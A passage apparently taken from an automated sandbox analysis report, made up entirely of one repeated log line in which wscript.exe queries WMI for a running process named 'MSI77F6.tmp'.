                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
